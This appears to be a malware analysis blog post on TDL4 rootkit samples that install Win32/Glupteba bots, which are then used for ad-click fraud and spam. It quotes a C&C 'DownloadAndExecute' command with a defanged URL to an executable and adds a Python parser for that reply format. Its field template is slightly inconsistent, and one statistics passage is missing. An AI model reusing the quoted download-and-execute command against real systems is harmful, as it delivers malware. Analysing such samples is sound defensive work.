Not long ago, we noticed an interesting feature in some new samples of the TDL4 rootkit (Win32/Olmarik.AOV). For those who do not know, this rootkit has held the title of the most technologically advanced mass malware for several years now. It is the first full-fledged x64 rootkit that managed to bypass digital signature verification and PatchGuard and sneak into the kernel on 64-bit systems.
After a successful installation, some copies of this rootkit install Trojans from the Win32/Glupteba family onto the system. This suggests that the resources of this botnet have started to be leased out. It is also interesting that there is no further interaction between the Win32/Glupteba and TDL4 bots.
So, immediately after successful installation and identification, the TDL4 bot receives the following command from its C&C:
task_id = 2|10||h**p://wheelcars.com/no.exe

This can be interpreted as follows:

task_id = [command_id] [encryption_key] [URL]

In our case the set of parameters matches the "DownloadAndExecute" command: the command identifier is 2, the encryption key is zero (the empty field), and the number of attempts to execute the command is ten.
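To make the field layout above concrete, here is a small parser for the task reply, written as an added example for this post rather than code from the rootkit or from any analysis tool. It assumes the field order that the article's reading of the sample implies (command_id | attempts | encryption_key | URL, with an empty key field meaning key zero); the command-id-to-name mapping contains only the "DownloadAndExecute" id the article mentions, and the sample reply keeps the URL defanged exactly as quoted.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Command identifiers named in the article; other ids are not documented there.
COMMAND_NAMES = {2: "DownloadAndExecute"}

_TASK_LINE = re.compile(r"^\s*task_id\s*=\s*(?P<body>.+?)\s*$")


@dataclass(frozen=True)
class Tdl4Task:
    command_id: int
    attempts: int
    encryption_key: int  # 0 (empty field) is read in the article as "no encryption key"
    url: str

    @property
    def command_name(self) -> str:
        return COMMAND_NAMES.get(self.command_id, f"unknown({self.command_id})")


def parse_task(line: str) -> Tdl4Task:
    """Parse one 'task_id = ...' C&C reply into its fields.

    Assumed field order (inferred from the article's interpretation of the sample):
        command_id | attempts | encryption_key | URL
    Raises ValueError on anything that does not fit that shape, so a malformed
    or unexpected reply is surfaced instead of silently mis-read.
    """
    m = _TASK_LINE.match(line)
    if not m:
        raise ValueError(f"not a task line: {line!r}")
    fields = [f.strip() for f in m.group("body").split("|")]
    if len(fields) != 4:
        raise ValueError(f"expected 4 pipe-separated fields, got {len(fields)}: {line!r}")
    cmd, attempts, key, url = fields
    if not cmd.isdigit() or not attempts.isdigit():
        raise ValueError(f"command_id and attempts must be integers: {line!r}")
    if key and not key.isdigit():
        raise ValueError(f"encryption_key must be empty or an integer: {line!r}")
    if not url:
        raise ValueError(f"empty URL field: {line!r}")
    return Tdl4Task(int(cmd), int(attempts), int(key) if key else 0, url)


def try_parse(line: str) -> Optional[Tdl4Task]:
    """Convenience wrapper: None instead of an exception for malformed input."""
    try:
        return parse_task(line)
    except ValueError:
        return None


def is_download_and_execute(task: Tdl4Task) -> bool:
    return task.command_id == 2


# Constructed sample input: the reply quoted in the article, URL left defanged (h**p).
SAMPLE_REPLY = "task_id = 2|10||h**p://wheelcars.com/no.exe"

if __name__ == "__main__":
    t = parse_task(SAMPLE_REPLY)
    print(f"{t.command_name}: attempts={t.attempts} key={t.encryption_key} url={t.url}")
```

The double pipe in the reply is what produces the empty encryption-key field; splitting on a single "|" and requiring exactly four fields is what lets the parser distinguish that case from a reply that simply omits a field.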
Once Win32/Glupteba is installed on the system, it receives its tasks from its own C&C and starts executing them.

Most often, the bot receives two types of tasks: the first is clicking on contextual ads from the Begun advertising network, and the second is sending spam. Let's take a closer look at what this bot does.
In the first case, the bot visits a large number of specially crafted web pages whose content triggers a certain type of contextual ad. All of the web pages from which the clicks originate are hosted on servers of the Masterhost provider.

The statistics of the click bot's network calls look like this:

The TDL4 botnet itself, like its predecessor, is also actively monetized through "black" website-promotion methods and the substitution of search results in popular search engines.